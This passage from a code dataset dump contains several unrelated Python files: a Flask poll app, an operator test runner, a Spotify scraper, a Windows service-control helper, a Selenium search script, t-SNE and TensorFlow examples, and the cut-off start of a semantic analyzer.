file_handler.setFormatter(RequestFormatter(\n        '[%(asctime)s] %(remote_addr)s requested %(url)s\\n'\n        '%(levelname)s in %(module)s: %(message)s'))\n    file_handler.setLevel(logging.INFO)\n    app.logger.addHandler(file_handler)\n    app.logger.setLevel(logging.INFO)\n    app.logger.info(\"Startup\")\n\ndb.init_app(app)\n\napp.register_blueprint(polls.bp)\napp.register_blueprint(search.bp)\n\n@app.route(\"/\")\ndef home():\n    # Fetch the most recent 20 open and closed polls\n    open_polls = db_funcs.get_recent_polls(20, True)\n    closed_polls = db_funcs.get_recent_polls(20, False)\n    return render_template(\"index.html\", open_polls=open_polls,\n                           closed_polls=closed_polls)\n\n@app.route(\"/about\")\ndef about():\n    return render_template(\"about.html\")\n\n@app.errorhandler(404)\ndef page_not_found(e):\n    return render_template(\"404.html\"), 404\n\n@app.errorhandler(500)\ndef internal_server_error(e):\n    app.logger.error(\"Error 500\")\n    return render_template(\"500.html\"), 500\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"633266450","text":"# Copyright 2020 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY 
KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\nimport os\nimport json\nimport pytest\nimport logging\nfrom akg import composite\nfrom akg.utils import custom_tiling\nfrom akg.utils import kernel_exec as utils\nfrom gen_json_data import gen_json_data\nfrom base import get_rtol_atol\nfrom tensorio import compare_tensor\nlogging.getLogger().setLevel(logging.INFO)\n\ndef print_usage():\n logging.info(\"Usage: test_composite_json.py to run single file.\")\n logging.info(\"Usage: test_composite_json.py -d to run files in a directory, default to be ./json_dir.\")\n logging.info(\"Usage: test_composite_json.py -ci to run ci files.\")\n logging.info(\"compile composite op\")\n\ndef get_result(desc, attrs=None):\n input_for_mod, expect, output_indexes = gen_json_data(desc)\n\n if attrs:\n mod = composite.build(desc, attrs)\n else:\n mod = composite.build(desc)\n output = utils.mod_launch(mod, input_for_mod, output_indexes)\n\n rtol, atol = get_rtol_atol(\"FUSED\", \"float32\")\n flag = True\n if len(output_indexes) > 1:\n if not all(map(lambda x, y: compare_tensor(x, y, rtol=rtol, atol=atol), output, expect)):\n flag = False\n else:\n if not compare_tensor(output, expect, rtol=rtol, atol=atol):\n flag = False\n return flag\n\n@pytest.mark.skip\ndef test_single_file(input_file, use_custom):\n with open(input_file, 'r') as f:\n desc = f.read()\n if use_custom:\n attrs = {}\n attrs[\"dim\"] = custom_tiling.set_dims(((4, 1), (4, 1)))\n flag = get_result(desc, attrs)\n else:\n flag = get_result(desc)\n if flag:\n logging.info(\"Run Pass!\")\n else:\n logging.info(\"Precision Error\")\n\n@pytest.mark.skip\ndef test_json_dir():\n json_dir = \"./json_dir/\"\n json_dims_file = \"./json_dir/dims.json\"\n files = os.listdir(json_dir)\n flag = True\n with open(json_dims_file, 'r') as f:\n base = f.read()\n dims_dict = json.loads(base)\n for input_file in files:\n with open(json_dir + input_file, 'r') as f:\n if input_file == \"dims.json\":\n continue\n desc = f.read()\n if input_file in dims_dict:\n dim_info = dims_dict[input_file]\n attrs = {'dim': dim_info}\n flag = get_result(desc, attrs)\n else:\n flag = get_result(desc)\n if not flag:\n logging.info(\"----------Error Json name is----------\")\n logging.info(input_file)\n raise ValueError(\"Precision Error\")\n logging.info(\"All Json files run PASS!\")\n\ndef get_op_cycles_info(desc, cycle_info_file, old_op_cycles=100000000):\n with open(cycle_info_file, 'r') as f:\n op_cycles = int(f.read())\n diff = old_op_cycles - op_cycles\n return op_cycles, diff\n\n@pytest.mark.level0\ndef test_ci(profile=False):\n ci_path = \"./need_adapt/\"\n if profile:\n need_update = False\n base_json_file = \"./need_adapt/base.json\"\n cycle_info_file = \"./cycle_path/a.txt\"\n os.environ['PROFILING'] = \"true\"\n os.environ['CYCLES_PATH'] = os.getcwd() + '/' + cycle_info_file\n with open(base_json_file, 'r') as f:\n base = f.read()\n old_dict = json.loads(base)\n files = os.listdir(ci_path)\n for fi in files:\n with open(ci_path + fi, 'r') as f:\n if fi == \"base.json\":\n continue\n desc = f.read()\n flag = get_result(desc)\n if not flag:\n logging.info(\"----------Error Json info is----------\")\n logging.info(desc)\n raise ValueError(\"Precision Error\")\n elif not profile:\n logging.info(\"Composite Json {} pass!\".format(fi))\n else:\n old_op_cycles = old_dict[fi]\n op_cycles, diff = get_op_cycles_info(desc, cycle_info_file, old_op_cycles)\n 
logging.info(\"~~~~~~~~~~~cycle diff is~~~~~~~~~~~\")\n logging.info(diff)\n if diff > 500:\n need_update = True\n logging.info(\"Find Better Cycle the Json Info is:\")\n logging.info(desc)\n logging.info(\"The Better Cycle is:\")\n logging.info(op_cycles)\n old_dict[fi] = op_cycles\n elif diff < -1000:\n logging.info(\"----------Error Json info is----------\")\n logging.info(desc)\n raise ValueError(\"Performance Degradation\")\n assert(flag)\n logging.info(\"All ops are ok!\")\n if profile:\n if need_update:\n logging.info(\"Need to Update Baseline!!!\")\n with open(base_json_file, 'w', encoding='utf-8') as f:\n json.dump(old_dict, f, indent=4)\n else:\n logging.info(\"No significant performance improvement. Do not need to update Baseline!\")\n\ndef main(argv):\n if len(argv) in [1, 2] and (argv[0].endswith(\".info\") or argv[0].endswith(\".json\")):\n use_custom = len(argv) == 2 and argv[1] == 'c'\n test_single_file(argv[0], use_custom)\n elif len(argv) == 1 and argv[0] == \"-d\":\n test_json_dir()\n elif len(argv) == 1 and argv[0] == \"-ci\":\n test_ci(profile=False)\n elif len(argv) == 1 and argv[0] == \"-cip\":\n test_ci(profile=True)\n else:\n print_usage()\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"tests/operators/composite/test_composite_json.py","file_name":"test_composite_json.py","file_ext":"py","file_size_in_byte":6050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"231828158","text":"import math\nimport os\nimport sys\nsys.path.append(os.path.dirname(os.path.abspath(__file__)))\nfrom query_music import QueryMusic\nimport curl_spotify \n\nclass ScrapePopularity(object):\n\tdef __init__(self):\n\t\tself.query = QueryMusic()\n\n\tdef get_song_uris(self):\n\t\tsongs = self.query.query(\"\"\"\n\t\t\tselect id, uri from spotify_song \n\t\t\tleft join spotify_song_popularity\n\t\t\t\ton spotify_song_popularity.song = spotify_song.id\n\t\t\twhere spotify_song_popularity.timestamp is null or spotify_song_popularity.timestamp < (now() - interval '90 days')\n\t\t\torder by spotify_song_popularity.timestamp asc nulls first\n\t\t\tlimit 100\"\"\")\n\n\t\treturn [{\"id\": x[0], \"uri\": x[1]} for x in songs]\n\n\tdef get_song_popularity(self, songs):\n\t\tfor song in songs:\n\t\t\ttrack = curl_spotify.get_tracks([song[\"uri\"]])['tracks'][0]\n\t\t\tself.query.query(\"update spotify_song_popularity set popularity = %s, timestamp = now() where song = %s returning 1\", (track['popularity'], song['id']))\n\t\t\tself.query.query(\"insert into spotify_song_popularity (song, popularity, timestamp) select %s, %s, now() where not exists (select 1 from spotify_song_popularity where song = %s) returning 1\", (song['id'], track['popularity'], song['id']))\n\n\t\treturn True\n\t\t\t\ndef main():\n\tscraper = ScrapePopularity()\n\tsongs = scraper.get_song_uris()\n\tscraper.get_song_popularity(songs)\n\nif __name__ == '__main__': \n main()\n\n","sub_path":"lib/scrape_popularity.py","file_name":"scrape_popularity.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"417302591","text":"# -*- coding: utf-8 -*-\n\n# 2019/3/20 0020 上午 10:59 \n\n__author__ = 'RollingBear'\n\nimport os\nimport time\nimport logging\nimport traceback\n\n\nclass system_service():\n\n def __init__(self):\n pass\n\n def get_service_state(self, service_name):\n\n '''\n get service state with a cmd command\n :param service_name: service's name\n :return: 
service state(str)\n        '''\n\n        try:\n            result = os.popen('sc query ' + service_name).read()\n\n            if 'RUNNING' in result or \"START_PENDING\" in result:\n                return 'active'\n            elif 'STOPPED' in result or 'STOP_PENDING' in result:\n                return 'inactive'\n            elif '1060' in result:\n                return 'uninstalled'\n        except Exception:\n            logging.info(traceback.format_exc())\n\n    def service_state_operate(self, service_name, state):\n\n        '''\n        start or stop an installed service with a cmd command\n        :param service_name: service's name\n        :param state: start or stop, used to control whether the function starts or stops the service\n        :return: service start or stop result\n        '''\n\n        try:\n            result = os.popen('sc ' + state + ' ' + service_name).read()\n\n            if '1058' in result:\n                return 'error'\n            elif '1060' in result:\n                return 'uninstalled'\n            elif '1056' in result:\n                return 'active'\n            elif '1062' in result:\n                return 'inactive'\n            elif 'START_PENDING' in result or 'STOP_PENDING' in result:\n                return 'success'\n        except Exception:\n            logging.info(traceback.format_exc())\n\n    def restart_service(self, service_name):\n\n        '''\n        restart an installed service with a cmd command\n        :param service_name: service's name\n        :return: service restart result\n        '''\n\n        try:\n            result_stop = self.service_state_operate(service_name, 'stop')\n            time.sleep(1)\n            try:\n                result_start = self.service_state_operate(service_name, 'start')\n            except Exception:\n                logging.info(traceback.format_exc())\n\n            if (result_stop == 'success' and result_start == 'success') or (\n                    result_stop == 'inactive' and result_start == 'success'):\n                return 'success'\n            elif result_stop == 'uninstalled' or result_start == 'uninstalled':\n                return 'uninstalled'\n            elif result_stop == 'error' or result_start == 'error':\n                return 'error'\n        except Exception:\n            logging.info(traceback.format_exc())\n\n    def auto_start_service(self, service_name, state):\n\n        '''\n        set the service start auto or demand, or disable the service\n        :param service_name: service's name\n        :param state: service start state, auto or demand or disable\n        :return: Null\n        '''\n\n        try:\n            os.popen('sc config ' + service_name + ' start= ' + state)\n            return None\n        except Exception:\n            logging.info(traceback.format_exc())\n\n    def delete_service(self, service_name):\n\n        '''\n        delete an installed service with a cmd command\n        :param service_name: service's name\n        :return: delete result\n        '''\n\n        try:\n            result_stop = self.service_state_operate(service_name, 'stop')\n            time.sleep(1)\n            try:\n                result_delete = os.popen('sc delete ' + service_name).read()\n            except Exception:\n                logging.info(traceback.format_exc())\n\n            if (result_stop == 'success' and '成功' in result_delete) or (\n                    result_stop == 'inactive' and '成功' in result_delete):\n                return 'success'\n            elif result_stop == 'uninstalled':\n                return 'success'\n            elif result_stop == 'error' and '成功' not in result_delete:\n                return 'error'\n        except Exception:\n            logging.info(traceback.format_exc())\n\n    def open_log(self, service_log):\n\n        '''\n        open log file of the service with a cmd command\n        :param service_log: service's log address\n        :return: Null\n        '''\n\n        try:\n            os.system('notepad ' + service_log)\n            return None\n        except Exception:\n            logging.info(traceback.format_exc())\n\n    # wait to rewrite\n    def open_file(self, log_file_address):\n\n        '''\n        open log folder of the service with a cmd command\n        :param log_file_address: address of the log file folder\n        :return: Null\n        '''\n\n        try:\n            os.popen('start ' + os.path.abspath(log_file_address))\n            return None\n        except Exception:\n            logging.info(traceback.format_exc())\n\n    def open_setup(self, service_name, service_setup):\n\n        
'''\n        add service into registry and service list\n        :param service_name: service's name\n        :param service_setup: address of setup file\n        :return: Null\n        '''\n\n        try:\n            os.popen('sc create ' + service_name + ' binPath= ' + service_setup)\n            return None\n        except Exception:\n            logging.info(traceback.format_exc())\n","sub_path":"system_service.py","file_name":"system_service.py","file_ext":"py","file_size_in_byte":5252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"517950153","text":"# -*- coding: utf-8 -*-\n\"\"\"\nStorage Format Conversion Class\n\"\"\"\n\nimport math\nimport re\n\n__author__ = \"Sean Douglas\"\n__version__ = \"0.1.0\"\n__license__ = \"MIT\"\n\n\nclass UnitConversion:\n    \"\"\"\n    Class to convert between byte and human readable storage formats\n    \"\"\"\n    units = ['B', 'KB', 'MB', 'GB', 'TB', 'PB']\n\n    def __init__(self, binary: bool=True):\n        self.nn = 1024 if binary else 1000\n\n    @staticmethod\n    def _separate(val: str) -> tuple:\n        \"\"\"\n        Extract a float and unit type from a string\n        :param val: str\n        :return: tuple([float, str])\n        \"\"\"\n        if not val:\n            return tuple([0.00, 'b'])\n        elif not len(val.split()) > 1:\n            _ = re.search('([\\\\d.]+)(.*)', val)\n            if _:\n                m = _.groups()\n                return tuple([float(m[0]), m[1] if m[1] else 'b'])\n        else:\n            s = val.split()\n            return tuple([float(s[0]), s[1]])\n\n    def _convert_bytes(self, x_bytes: int) -> tuple:\n        \"\"\"\n        Converts bytes to a tuple that is easier to read\n        :param x_bytes: int\n        :return: tuple([float, str])\n        \"\"\"\n        if x_bytes:\n            u = int(math.floor(math.log(x_bytes) / math.log(self.nn)))\n            return tuple([x_bytes / math.pow(self.nn, u), self.units[u].lower()])\n        else:\n            return tuple([None, None])\n\n    def _convert_string(self, value: float, unit: str) -> int:\n        \"\"\"\n        Convert a tuple containing a human readable string representation to bytes\n        :param value: float\n        :param unit: str\n        :return: int\n        \"\"\"\n        try:\n            x = self.units.index(unit.upper())\n            return int(value * math.pow(self.nn, x))\n        except ValueError as v:\n            print('Unit not supported, {}: {}'.format(v.args[-1], ', '.join(self.units)))\n\n    @classmethod\n    def bytes_to_str(cls, x_bytes: int, binary: bool=True, precision: int=2) -> str:\n        \"\"\"\n        Convert bytes integer to a human readable string.\n        :param x_bytes: int\n        :param binary: bool, True uses binary units (1024), False uses base 10 (1000)\n        :param precision: int, decimal precision\n        :return: str\n        \"\"\"\n        res = cls(binary)._convert_bytes(x_bytes)\n        return '{}{}'.format(round(res[0], precision), res[1])\n\n    @classmethod\n    def str_to_bytes(cls, value: str, binary: bool=True) -> int:\n        \"\"\"\n        Convert human readable string into an bytes integer\n        :param value: str\n        :param binary: bool, True uses binary units (1024), False uses base 10 (1000)\n        :return: int\n        \"\"\"\n        s = cls._separate(value)\n        return cls(binary)._convert_string(s[0], s[1])\n","sub_path":"common_utils/unit_conversion.py","file_name":"unit_conversion.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"354319445","text":"'''\nCreated on 27-Aug-2019\n\n@author: kapilmehta\nSearch Flipkart without logging in\n'''\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nimport unittest\nfrom selenium.common.exceptions import 
StaleElementReferenceException\n\n\ndriver = webdriver.Chrome(\"/Users/kapilmehta/Downloads/chromedriver\")\ndriver.maximize_window()\n\n'Opening website, verifying the title and searching'\ndriver.get('https://www.flipkart.com/')\n\nelement = driver.title\nprint(element)\nassert element == \"Online Shopping Site for Mobiles, Electronics, Furniture, Grocery, Lifestyle, Books & More. Best Offers!\"\n\nWebDriverWait(driver, 10).until(EC.visibility_of_element_located((By.XPATH, \"//span[text()='Login']\")))\n\ndriver.find_element_by_xpath(\"//button[contains(text(), '✕')]\").click()\nWebDriverWait(driver, 10).until(EC.visibility_of_element_located((By.XPATH, \"//*[contains(.,'Login & Signup')]\")))\n\ndriver.find_element_by_name(\"q\").send_keys(\"istqb\")\n\ntime.sleep(2)\nallbook = driver.find_elements_by_xpath(\".//form[@class='_1WMLwI header-form-search']//ul//li\")\nfor item in allbook :\n    print(item.text)\n\nfor item in allbook :\n    try:\n        if item.text == \"foundation of software testing istqb certification - istqb certification\":\n            time.sleep(1)\n            #driver.find_element_by_xpath(\".//form[@class='_1WMLwI header-form-search']//ul//li[contains(text(), 'foundation of software testing istqb certification - istqb certification'])\").click()\n            driver.find_element_by_xpath(\"//a[contains(@href, 'foundation')]\").click()\n    except StaleElementReferenceException as exception:\n        pass \nif __name__ == \"__main__\":\n    unittest.main()\n\ntime.sleep(5)\ndriver.quit()","sub_path":"FlipkartSearch.py","file_name":"FlipkartSearch.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"227930731","text":"# M. P. Hayes UCECE\nimport numpy as np\nfrom ipywidgets import interact, interactive, fixed\nfrom .lib.signal_plot import signal_overplot3\nfrom .lib.utils import gauss, rect, trap2\n\ndef BLUE_demo4_plot(muX1=2, muX2=2, sigmaX1=1.0, sigmaX2=2.0, w1=0.5):\n\n    w2 = 1.0 - w1\n    \n    WX1 = sigmaX1 * np.sqrt(12)\n    WX2 = sigmaX2 * np.sqrt(12)\n\n    muX = w1 * muX1 + w2 * muX2\n    sigmaX = np.sqrt(w1**2 * sigmaX1**2 + w2**2 * sigmaX2**2) \n    WX = w1 * WX1 + w2 * WX2\n    TX = abs(w1 * WX1 - w2 * WX2)\n    \n    N = 401\n    x = np.linspace(-8, 8, N)\n    \n    fX1 = rect((x - muX1) / WX1) / WX1\n    fX2 = rect((x - muX2) / WX2) / WX2\n    fX = trap2(x - muX, TX, WX) * (2 / (TX + WX))\n\n    fig = signal_overplot3(x, fX1, x, fX2, x, fX, ('$f_{\\\\hat{X}_1}(x)$', '$f_{\\\\hat{X}_2}(x)$', '$f_{\\\\hat{X}}(x)$'), ylim=(0, 0.5))\n    fig.axes[0].set_xlabel('$x$')\n    fig.axes[0].grid(True) \n\ndef BLUE_demo4():\n    interact(BLUE_demo4_plot,\n             sigmaX1=(0.5, 4.0, 0.1),\n             sigmaX2=(0.5, 4.0, 0.1),\n             w1=(0, 1.0, 0.05))\n    \n    \n\n    \n\n","sub_path":"sensor-fusion/demos/BLUE_demo4.py","file_name":"BLUE_demo4.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"329902023","text":"\nimport pandas as pd\nimport numpy as np\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\ndef min_dict(freq):\n\n    \"\"\"\n    Normalize the minute index\n    :param freq: minute frequency\n    :return: dict of the normalized minute sequence\n\n    \"\"\"\n    day = '2016-02-01'\n    df_1min=pd.DataFrame({'time':list(pd.date_range(day+' 09:30:00',day+' 11:30:00',freq='1min'))+list(pd.date_range(day+' 13:00:00',day+' 15:00:00',freq='1min'))})\n    df_1min.time=df_1min.time.apply(lambda x:int(x.strftime('%H%M')))\n\n    df=pd.DataFrame({'time_ls':list(pd.date_range(day+' 09:30:00',day+' 11:30:00',freq=freq))+list(pd.date_range(day+' 13:00:00',day+' 15:00:00',freq=freq))})\n    
df.time_ls=df.time_ls.apply(lambda x:int(x.strftime('%H%M')))\n\n df=df.merge(df_1min,left_on='time_ls',right_on='time',how='outer')\n df=df.sort_values('time')\n df.time_ls=df.time_ls.fillna(method='bfill')\n df=df.astype(int)\n df['i']=1\n df={x:v[1] for x,v in df.pivot(index='i',columns='time',values='time_ls').items()}\n\n return df\n\n\nif __name__=='__main__':\n\n freq='10min'\n dd=min_dict(freq)\n\n","sub_path":"myFuncs.py","file_name":"myFuncs.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"378010544","text":"import logging\nimport os\nimport sys\nimport auxiliary_module as aux\n\nfile_dir = os.path.dirname(\"auxiliary _module.py\")\nsys.path.append(file_dir)\n\n\n# sys.path.append(\"scripting/auxiliary _module.py\")\n\n# create logger with 'spam_application'\nlogger = logging.getLogger('spam_application')\nlogger.setLevel(logging.DEBUG)\n\n# create a file handler which logs even debug messages (FILE HANDLER)\nfh = logging.FileHandler('spam.log')\nfh.setLevel(logging.DEBUG)\n\n# create console handler with a higher log level (CONSOLE HANDLER)\nch = logging.StreamHandler()\nch.setLevel(logging.ERROR)\n\n# create formatter and add it to the handler\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nfh.setFormatter(formatter)\nch.setFormatter(formatter)\n\n# add the handlers to the logger\n# comment out\n# logger.addHandler(fh)\n# logger.addHandler(ch)\n#\n# logger.info('creating an instance of auxiliary_module.Auxiliary')\n# a = aux.Auxiliary()\n# logger.info('created an instance of auxiliary_module.Auxiliary')\n#\n# logger.info('calling auxiliary_module.Auxiliary.do_something')\n# a.do_something()\n# logger.info('finished auxiliary_module.Auxiliary.do_something')\n#\n# logger.info('calling auxiliary_module.some_function()')\n# aux.some_function()\n# logger.info('done with auxiliary_module.some_function()')\n\n# remove test_time & test_scenarios\n","sub_path":"logging_demo.py","file_name":"logging_demo.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"139930584","text":"from typing import List, Optional\n\nfrom ..common.models import GameEvent\n\n\nclass GameFlow:\n def __init__(self):\n self.events: Optional[List[GameEvent]] = list()\n self.time: Optional[float] = 0.0\n\n async def update(self, events_data, game_data):\n self.events = [GameEvent(**event) for event in events_data]\n self.time = game_data.get(\"gameTime\") or 0.0\n","sub_path":"leaguepybotv2/game_watcher/game_flow.py","file_name":"game_flow.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"246699579","text":"import sys\nimport time\n\nimport matplotlib.pylab as pylab\nimport numpy as np\n\nfrom tsne_for_spikesort import gpu\nfrom tsne_for_spikesort import sptree_jit as sptree\n\n# import tsne_for_spikesort.spikesorttsne as sptsne\nimport tsne_for_spikesort.io_with_cpp as io\n\nfrom subprocess import Popen, PIPE\n\nfrom os import replace\nfrom os.path import join as path_join\nimport sys\n\n\ndef run(data, indices_of_first_and_second_matrices, intermediate_file_dir, iters, perplexity, eta=200, num_dims=2,\n theta=0.2, verbose=True, exe_dir=None):\n\n # zero mean input data\n data = pylab.demean(data, axis=0)\n\n # normalize input data\n data /= data.max()\n\n\n\n num_samples = 
data.shape[0]\n\n\n    # find distances in hd space and sort\n    s1 = time.time()\n    closest_indices_in_hd, closest_distances_in_hd = \\\n        gpu.calculate_knn_distances_close_on_probe(template_features_sorted=data,\n                                                   indices_of_first_and_second_matrices=\n                                                   indices_of_first_and_second_matrices,\n                                                   perplexity=perplexity,\n                                                   verbose=verbose)\n    e1 = time.time()\n    if verbose > 1:\n        print('Time for Knn distance calculation: ' + str(e1 - s1))\n\n    # compute_gaussian_perplexity\n    indices_p, values_p = _compute_gaussian_perplexity(closest_indices_in_hd, closest_distances_in_hd,\n                                                       perplexity=perplexity)\n\n    # renormalize\n    sum_p = np.sum(values_p)\n    values_p /= sum_p\n\n\n    indices_p = indices_p.astype(np.uint)\n    values_p = values_p.astype(np.float64)\n\n    num_knns = indices_p.shape[1]\n\n    # initialize solution\n    y = np.random.random((num_samples, num_dims)) * 0.0001\n    y = np.array(y, dtype=np.float64)\n\n    s2 = time.time()\n\n    #y = run_iterations_with_python(y, iters, indices_p, values_p, num_samples, num_dims, eta, verbose)\n\n    #y = run_iterations_with_cython(y, num_samples, num_dims, indices_p, values_p, num_knns, perplexity,\n    #                               theta, eta, iters, verbose)\n\n    y = run_iterations_with_cpp_exe(intermediate_file_dir, y, indices_p, values_p, num_knns, theta, perplexity, eta, iters,\n                                    verbose, exe_dir=exe_dir)\n\n    e2 = time.time()\n    if verbose > 1:\n        print('Time for calculating the t-sne data: ' + str(e2 - s2))\n    if verbose > 1:\n        print('Time for total calculation: ' + str(e2 - s1))\n\n    return y\n\n\ndef _compute_gaussian_perplexity(selected_sorted_indices, selected_sorted_distances,\n                                 perplexity=100):\n    k = selected_sorted_indices.shape[1]\n    n = selected_sorted_indices.shape[0]\n    dbl_min = sys.float_info[3]\n    dbl_max = sys.float_info[0]\n\n    ind_p = selected_sorted_indices.astype(int)\n    val_p = np.empty((n, k))\n    for spike in np.arange(n):\n        beta = 1.0\n        found = False\n        min_beta = -dbl_max\n        max_beta = dbl_max\n        tolerance = 1e-5\n\n        iter = 0\n        sum_p = 0\n        while not found and iter < 200:\n            cur_distances = selected_sorted_distances[spike, :]\n            cur_p = np.exp(-beta * cur_distances)\n            sum_p = dbl_min + np.sum(cur_p)\n            H = np.sum(beta * cur_distances * cur_p) / sum_p + np.log(sum_p)\n\n            H_diff = H - np.log(perplexity)\n            if H_diff < tolerance and -H_diff < tolerance:\n                found = True\n            else:\n                if H_diff > 0:\n                    min_beta = beta\n                    if max_beta == dbl_max or max_beta == -dbl_max:\n                        beta *= 2.0\n                    else:\n                        beta = (beta + max_beta) / 2.0\n                else:\n                    max_beta = beta\n                    if min_beta == -dbl_max or min_beta == dbl_max:\n                        beta /= 2.0\n                    else:\n                        beta = (beta + min_beta) / 2.0\n            iter += 1\n\n        cur_p /= sum_p\n\n        val_p[spike, :] = cur_p\n\n    return ind_p, val_p\n\n\ndef _compute_gradient_on_cpu_with_sptree(t_sne, indices_p, values_p, theta):\n\n    dimension = t_sne.shape[1]\n    num_of_points = t_sne.shape[0]\n    neg_forces = np.zeros((num_of_points, dimension))\n    sum_q = [0.0]\n\n    tree = sptree.SPTree(inp_dimension=dimension, inp_data=t_sne, inp_num_of_points=num_of_points)\n\n    pos_forces = tree.compute_edge_forces(indices_p=indices_p, values_p=values_p, N=num_of_points)\n    for n in np.arange(num_of_points):\n        tree.compute_non_edge_forces(point_index=n, theta=theta, neg_force=neg_forces, sum_q=sum_q)\n\n    dy = pos_forces - (neg_forces / sum_q[0])\n\n    return dy\n\n\ndef run_iterations_with_python(y, iters, indices_p, values_p, num_samples, num_dims, eta, verbose):\n\n    momentum = 0.5\n    final_momentum = 0.8\n    exaggeration = 12.0\n    stop_lying_iter = 250\n    mom_switch_iter = 250\n\n    uy = np.zeros((num_samples, num_dims))\n    gains = np.ones((num_samples, num_dims))\n\n    # run loop\n    verbose_gradient = False\n    if verbose > 2:\n        verbose_gradient = True\n\n    # lie about p-values\n    values_p *= exaggeration\n\n    # timer used by the progress report inside the loop\n    s3 = time.time()\n    for it in np.arange(iters):\n        # compute_gradient\n        dy = gpu.compute_gradient_on_gpu(y, indices_p=indices_p, values_p=values_p, verbose=verbose_gradient)\n        # dy = _compute_gradient_on_cpu_with_sptree(y, indices_p=indices_p, values_p=values_p, theta=theta)\n\n        # update gains\n        gains[np.argwhere(np.sign(dy) != np.sign(uy))] += 0.05\n        gains[np.argwhere(np.sign(dy) == np.sign(uy))] *= 0.95\n        gains[np.argwhere(gains < 0.01)] = 0.01\n\n        # update gradient\n        uy = momentum * uy - eta * gains * dy\n        y += uy\n\n        # zero mean solution\n        y = pylab.demean(y, axis=0)\n\n        if it == stop_lying_iter:\n            values_p /= exaggeration\n        if it == mom_switch_iter:\n            momentum = final_momentum\n\n        # evaluate error and print progress\n        if it % 5 == 0 and verbose:\n            e3 = time.time()\n            print('Time for iteration ' + str(it) + ' = ' + str(e3 - s3))\n            s3 = time.time()\n\n    return y\n\n'''\ndef run_iterations_with_cython(Y, N, no_dims, col_P, val_P, K, perplexity, theta, eta, iterations, verbose):\n    tsne = sptsne.SP_TSNE()\n    Y = tsne.run(Y, N, no_dims, col_P, val_P, K, int(perplexity), theta, eta, iterations, verbose)\n\n    return Y\n'''\n\ndef run_iterations_with_cpp_exe(files_dir, y, col_p, val_p, k, theta, perplexity, eta, iterations, verbose, exe_dir=None):\n\n    io.save_data_for_tsne(files_dir, y, col_p, val_p, k, theta, perplexity, eta, iterations, verbose)\n\n    del y\n    # Call Barnes_Hut.exe and let it do its thing\n    if exe_dir is None:\n        exe_dir = io._find_exe_dir()\n    with Popen([exe_dir], cwd=files_dir, stdout=PIPE, bufsize=1, universal_newlines=True) \\\n            as t_sne_exe:\n        for line in iter(t_sne_exe.stdout):\n            print(line, end='')\n            sys.stdout.flush()\n        t_sne_exe.wait()\n        assert not t_sne_exe.returncode, ('ERROR: Call to Barnes_Hut exited '\n                                          'with a non-zero return code exit status, please ' +\n                                          ('enable verbose mode and ' if not verbose else '') +\n                                          'refer to the t_sne output for further details')\n\n    return np.array(io.load_tsne_result(files_dir))\n\n","sub_path":"tsne_for_spikesort/t_sne.py","file_name":"t_sne.py","file_ext":"py","file_size_in_byte":7432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"477236302","text":"import tensorflow as tf\n\n# create a dataset from an array\ninput_data = [1, 2, 3, 5, 8]\ndataset = tf.data.Dataset.from_tensor_slices(input_data)\n\n# define an iterator to traverse the dataset. Since the dataset defined above takes no placeholder\n# as an input parameter, the simplest one_shot_iterator can be used here\niterator = dataset.make_one_shot_iterator()\n# the iterator's get_next() method stands for a tensor of one input element, similar to a queue's dequeue().\nx = iterator.get_next()\ny = x * x\n\nwith tf.Session() as sess:\n    for i in range(len(input_data)):\n        print(sess.run(y))\n","sub_path":"tensorflowinputdocument/DatasetBaseOne.py","file_name":"DatasetBaseOne.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"307101251","text":"import re\nimport TablaHash\nimport Funcion\nimport Variable\n\n\nclass AnalizadorSemantico:\n    def __init__(self):\n        self.tabla = TablaHash.TablaHash()\n        self.tokens = ['void','int','float','string']\n    \n\n    def buscar(self,num):\n        return self.tabla.Search(num)\n    \n\n    def _esFuncion(self,linea):\n        y = re.search('\\\(',linea)\n        if(y): \n            return True\n        else:\n            return False\n\n    def crear_tabla(self):\n        contador = 0\n        cuerpo = \"\"\n        booleana = bool(0)\n        contador2 = 0\n\n        with open(\"codigo.txt\", \"r\") as f:\n            for linea in f:\n                if self._esFuncion(linea) is True:\n                    
